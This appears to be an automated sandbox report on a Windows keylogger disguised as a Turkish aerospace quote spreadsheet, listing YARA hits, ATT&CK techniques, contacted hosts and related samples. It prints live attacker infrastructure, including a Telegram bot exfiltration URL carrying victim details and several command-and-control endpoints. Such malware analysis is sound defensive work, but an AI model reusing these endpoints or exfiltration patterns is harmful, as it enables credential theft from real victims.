                  Source: Yara matchFile source: 2.2.RegSvcs.exe.350000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00201204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00201204
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00201806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00201806
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts
                  11
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Valid Accounts
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  121
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  4
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                  Valid Accounts
                  3
                  Obfuscated Files or Information
                  Security Account Manager1
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Screen Capture
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  NTDS127
                  System Information Discovery
                  Distributed Component Object Model1
                  Email Collection
                  3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  2
                  Valid Accounts
                  LSA Secrets221
                  Security Software Discovery
                  SSH121
                  Input Capture
                  14
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials111
                  Virtualization/Sandbox Evasion
                  VNC3
                  Clipboard Data
                  Multiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Access Token Manipulation
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                  Process Injection
                  Proc Filesystem11
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe29%VirustotalBrowse
                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe37%ReversingLabsWin32.Trojan.AutoitInject
                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  104.21.67.152
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      checkip.dyndns.com
                      158.101.44.242
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2018/12/2024%20/%2007:04:25%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              http://checkip.dyndns.org/false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/RegSvcs.exe, 00000002.00000002.2658183432.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000029E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20aRegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.orgRegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.org/botTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.office.com/lBRegSvcs.exe, 00000002.00000002.2658183432.00000000029EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000002.00000002.2658183432.00000000029C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000029B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://varders.kozow.com:8081TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              high
                                                              https://chrome.google.com/webstore?hl=enpvRegSvcs.exe, 00000002.00000002.2658183432.00000000029B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.office.com/pvRegSvcs.exe, 00000002.00000002.2658183432.00000000029E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://aborters.duckdns.org:8081TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://anotherarmy.dns.army:8081TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://checkip.dyndns.org/qTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000002.00000002.2658183432.00000000029BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000002.00000002.2658183432.000000000287B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.2658183432.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://reallyfreegeoip.org/xml/TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          149.154.167.220
                                                                                          api.telegram.orgUnited Kingdom
                                                                                          62041TELEGRAMRUfalse
                                                                                          104.21.67.152
                                                                                          reallyfreegeoip.orgUnited States
                                                                                          13335CLOUDFLARENETUSfalse
                                                                                          158.101.44.242
                                                                                          checkip.dyndns.comUnited States
                                                                                          31898ORACLE-BMC-31898USfalse
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1576573
                                                                                          Start date and time:2024-12-17 09:40:22 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 6m 10s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:7
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/2@3/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 99%
                                                                                          • Number of executed functions: 47
                                                                                          • Number of non-executed functions: 292
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          TimeTypeDescription
                                                                                          03:41:26API Interceptor2629868x Sleep call for process: RegSvcs.exe modified
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          149.154.167.220PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                        l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                          pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              104.21.67.152PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                    Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                          FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                              CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  158.101.44.242PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  checkip.dyndns.comMV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 193.122.6.168
                                                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 193.122.130.0
                                                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 193.122.130.0
                                                                                                                                  hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 193.122.130.0
                                                                                                                                  Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 193.122.6.168
                                                                                                                                  QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 193.122.6.168
                                                                                                                                  FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  reallyfreegeoip.orgMV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 188.114.97.3
                                                                                                                                  Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  api.telegram.orgPAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  TELEGRAMRUPAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  69633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                  • 149.154.167.99
                                                                                                                                  Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 149.154.167.220
                                                                                                                                  CLOUDFLARENETUShttps://forms.gle/WXkgv9t1iFkxFXZb7Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                  • 104.17.25.14
                                                                                                                                  RkB7FehGh6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.2.110
                                                                                                                                  MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1Get hashmaliciousUnknownBrowse
                                                                                                                                  • 172.67.181.93
                                                                                                                                  c5bnEkMx.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                  • 104.21.64.1
                                                                                                                                  Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                  • 104.21.83.229
                                                                                                                                  sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                                                  • 188.114.97.6
                                                                                                                                  ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                  • 188.114.97.6
                                                                                                                                  payload_1.htaGet hashmaliciousRedLineBrowse
                                                                                                                                  • 104.21.87.65
                                                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 104.21.67.152
                                                                                                                                  ORACLE-BMC-31898USMV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 193.122.6.168
                                                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 158.101.44.242
                                                                                                                                  pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 193.122.130.0
                                                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 193.122.130.0
                                                                                                                                  ldr.ps1Get hashmaliciousGO Miner, XmrigBrowse
                                                                                                                                  • 147.154.227.160
                                                                                                                                  PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  • 193.122.130.0
                                                                                                                                  end.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 130.61.86.87
                                                                                                                                  Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 158.101.44.242
